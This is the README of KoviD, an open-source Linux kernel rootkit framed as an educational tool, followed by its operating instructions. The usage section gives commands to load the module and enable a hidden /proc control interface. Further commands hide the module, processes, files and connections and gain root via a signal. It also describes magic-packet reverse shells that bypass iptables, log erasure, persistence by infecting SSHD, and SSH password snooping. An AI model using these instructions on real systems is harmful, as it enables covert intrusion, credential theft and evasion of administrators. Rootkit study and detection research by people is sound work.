This project is strictly for educational purposes and defensive security research.
Rootkits are typically closed-source threats that operate in shadows, making them difficult to understand and defend against. KoviD exists to change this paradigm by providing an open-source implementation that:
- Empowers security researchers to understand rootkit techniques in a transparent, controlled environment
- Helps system administrators learn how to detect and defend against real-world threats
- Educates students and professionals about kernel-level security vulnerabilities
- Contributes to making Linux more secure by exposing potential attack vectors for defensive purposes
Most rootkits in the wild are closed-source, leaving defenders at a disadvantage. By providing an open-source implementation:
- Security professionals can study real rootkit techniques without reverse-engineering malware
- Defensive tools can be tested against known rootkit behaviors
- The security community can collaborate on detection and prevention methods
- Organizations can prepare their defenses against sophisticated kernel-level threats
WARNING: This software is provided for authorized security testing and educational purposes ONLY.
- DO NOT use this software on systems you do not own or lack explicit permission to test
- DO NOT use this software for any illegal or malicious purposes
- ALWAYS comply with all applicable laws and regulations in your jurisdiction
- REMEMBER: Unauthorized access to computer systems is illegal and unethical
By using this software, you agree to use it responsibly and solely for improving security posture and understanding.
KoviD serves as a comprehensive educational platform for:
- Analyze rootkit behavior in a controlled, observable environment
- Develop detection signatures for security tools and IDS/IPS systems
- Test defensive solutions against known rootkit techniques
- Research kernel security vulnerabilities and mitigation strategies
- Learn to identify signs of rootkit infection
- Understand attack vectors to better secure production systems
- Test incident response procedures in safe environments
- Validate security tools effectiveness against rootkit techniques
- Hands-on learning about kernel-level security concepts
- Practical demonstrations of theoretical security vulnerabilities
- Research projects on Linux kernel security
- Thesis work on rootkit detection and prevention methods
- Transparency: Open-source code allows the community to understand threats better
- Collaboration: Researchers can work together on detection methods
- Innovation: Drives development of better security tools and kernel hardening
- Preparation: Helps organizations prepare defenses before encountering real threats
KoviD is an open-source Loadable Kernel Module (LKM) security research tool
designed to help security professionals understand and defend against rootkit
techniques in Linux Kernel version 5 and later.
This educational tool demonstrates various rootkit capabilities to help defenders:
• Understand how rootkits hide from detection systems
• Test security monitoring and detection tools
• Learn kernel-level security vulnerabilities
• Develop better defensive strategies
Research capabilities demonstrated include:
• Module concealment techniques from SysFS
• Process hiding mechanisms in proc filesystem
• Log manipulation and evasion techniques
• CPU usage concealment methods
• Privilege escalation vectors
• File and directory hiding approaches
• Network connection concealment
By understanding these techniques, security professionals can better protect systems.
KoviD has influenced the security‑research community: it is cited in numerous
papers and analyses, and later tools have adopted technical ideas from it.
• [Phrack magazine](http://phrack.org/issues/71/12.html#article)
Where g1inko works on some challenges posed by `KoviD`
• [Black Hat Arsenal 2025](https://www.youtube.com/watch?v=FKcX-6jReAc)
wetw0rk's awesome [Sickle Payload Framework](https://github.com/wetw0rk/Sickle),
`KoviD` is deployed without touching the disk!
• [Sandfly Security](https://sandflysecurity.com/blog/sandfly-5-3-1-new-license-tiers-and-selinux-support)
Sandfly Agentless Linux Security and stealth rootkit detection technics
• [Thalium](https://blog.thalium.re/posts/linux-kernel-rust-module-for-rootkit-detection/)
Linux kernel Rust module for rootkit detection
• [Universite de Bordeaux](https://mastercsi.labri.fr/wp-content/uploads/2025/03/Kovid_Rootkit-Charbonnier_Raphel.pdf)
Master SCI KoviD rootkit case-study by Charbonnier Elouan & Raphel Elsa
• [Phrack magazine](http://phrack.org/issues/71/12.html#article)
Where g1inko works on some challenges posed by `KoviD`
• [Bloo](https://bloo.io/blog/inside-kovid-the-stealthy-linux-kernel-rootkit-threat)
Inside KoviD: The Stealthy Linux Kernel Rootkit Threat
We also inspire other LKM rootkits, with some unique set of features, to name a few:
• Ftrace disabling call interception
• TTY session logging
• tainted mask manipulation
• Process handling
• BPF introspection operations
• SysFS entries re-addition - Essential for debugging and development
The APT Down leak contains a rootkit that appears to reuse parts of KoviD, notably the SysFS hide/unhide implementation and helper routines — see links below.
APT Down - The North Korea Files, leak
A number of public‑domain projects have drawn inspiration from KoviD. In some cases developers adapted concepts or reused small, code fragments recreate features that were distinctive to our project:
We propose building it via docker, e.g.:
$ docker build --build-arg BASE_UBUNTU_VERSION=20.04 --build-arg UBUNTU_KERNEL_VERSION=5.15.0-43-generic -t kovid-builder .
For more info, check out docs/Automated-Build-With-Docker.md.
6.x: Linux 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC x86_64 x86_64 x86_64 GNU/Linux
gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0
5.x: Ubuntu 22.04.1 LTS
Linux hash-virtual-machine 5.19.0-41-generic #42~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC
UTC 2 x86_64 x86_64 x86_64 GNU/Linux
5.x: Linux Standard-PC-Q35-ICH9-2009 5.15.0-43-generic #46-Ubuntu
SMP x86_64 x86_64 x86_64 GNU/Linux
5.x: Ubuntu 22.04 LTS
Linux 5.15.0-43-generic #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0
5.x: Ubuntu 20.10
Linux ubuntu 5.8.0-55-generic #62-Ubuntu SMP Tue Jun 1 08:21:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
gcc (Ubuntu 10.3.0-1ubuntu1~20.10) 10.3.0
5.x: Ubuntu 18.04.5 LTS
Linux ubuntu 5.4.0-89-generic #100~18.04.1-Ubuntu SMP Wed Sep 29 10:59:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
4.x: Debian GNU/Linux 10
Linux debian10teste 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
gcc (Debian 8.3.0-6) 8.3.0
4.x: CentOS Linux release 8.3.2011
4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
gcc (GCC) 8.3.1 20191121 (Red Hat 8.3.1-5)
KoviD hides itself, making it challenging to detect. It customizes kernel
code to evade anti-rootkit detectors and disappears
from /sys/module listings.
KoviD hides files and directories effectively by hijacking filldir and
filldir64 kernel functions, significantly simplifying the process.
KoviD leverages Ftrace, a legitimate method for
function and syscall hijacking in Kernel v5+.
This approach offers greater stability compared
to traditional hooking techniques.
KoviD incorporates popular and reliable methods for backdooring systems,
such as port-knocking with custom packets.
These open connections to Netcat, OpenSSL, and Socat sessions.
KoviD sends magic packets and establishes reverse shell connections.
These packets trigger netfilter hooks and instruct KoviD to create a
reverse shell connection. These outgoing packets bypass iptables rules,
ensuring effective evasion.
Hiding processes is a crucial feature, giving KoviD the
ability to run undetected. It provides full support for
children processes, ensuring that no hanging processes are left behind.
KoviD's hidden tasks result in missing logs, making it
even more challenging for administrators to detect its
presence. It eliminates logs generated by userland tools
like w, lsmod, ps, who, ls.
KoviD hides network connections and manipulates network logs
to maintain stealth for back-doors. Libpcap+recvmsg.
(ss, tcpdump, netstat...)
Gain root privileges easily with kill -SIGCONT 666.
KoviD hides CPU consumption, making its processes invisible
as heavy consumers. However, be cautious not to max out the CPU,
as this can lead to unusual usage patterns.
KoviD offers persistence via Volundr. It can infect executables,
like SSHD, to ensure KoviD loads on reboot. You can also use your
preferred tool, Volundr use here is just a suggestion.
KoviD allows for the retrieval of base addresses of other executables
without needing to open /proc/<pid>/maps.
KoviD can evade few anti-rootkit tools that rely on BPF
(Berkeley Packet Filter) for detecting rootkits.
Tested against:
https://github.com/pathtofile/bpf-hookdetect.git
$ sudo insmod ./kovid.ko
$ cat /proc/sys/kernel/tainted
0
Before compiling and loading KoviD, edit the Makefile to choose a unique
name for /proc/<name>. Compile and load KoviD using sudo insmod kovid.
Ensure the chosen name for /proc/<name> is not easily predictable.
To enable the /proc/mytest interface, use the command:
$ kill -SIGCONT 31337.
The interface will disable itself after 120 seconds and can be
reactivated using the same command.
Some commands can return a status code.
Enable status code:
$ echo output-enable >/proc/mytest
$ cat /proc/mytest
1
$ echo output-disable >/proc/mytest
$ cat /proc/mytest
0
0 disabled
1 enabled
Command example after output-enable:
$ echo hide-lkm >/proc/mytest
$ cat /proc/mytest
0
You can hide/unhide processes using the /proc/mytest interface.
For example, to hide a task, run: $ echo 14886 >/proc/mytest.
If a task is a backdoor that needs tcp hiding, run:
$ echo hide-task-backdoor=<pid> >/proc/mytest
Unhiding is the same as for regular tasks:
$ echo "<PID>" >/proc/mytest
To hide the KoviD module, use the command: `$ echo hide-lkm >/proc/mytest`.
In release mode, the module is hidden by default,
and a key can be displayed by running `$ cat /proc/mytest`.
To hide a file or directory, use:
$ echo hide-file=/tmp/README.txt >/proc/mytest
To unhide, use:
$ echo unhide-file=README.txt >/proc/mytest
You can list hidden files
and directory names with:
$ echo list-hidden-file >/proc/mytest.
KoviD can snoop SSH sessions via tty keystrokes and steal passwords
and commands effectively.
For instructions, run 'scripts/bdclient.sh' and a help list is displayed.
As with any software, KoviD may have bugs.
If you encounter issues or oopses, please report them in detail for
potential fixes. Test KoviD extensively, preferably in a VM that
mimics the target environment.
Disclaimer: The use of KoviD in a real target is discouraged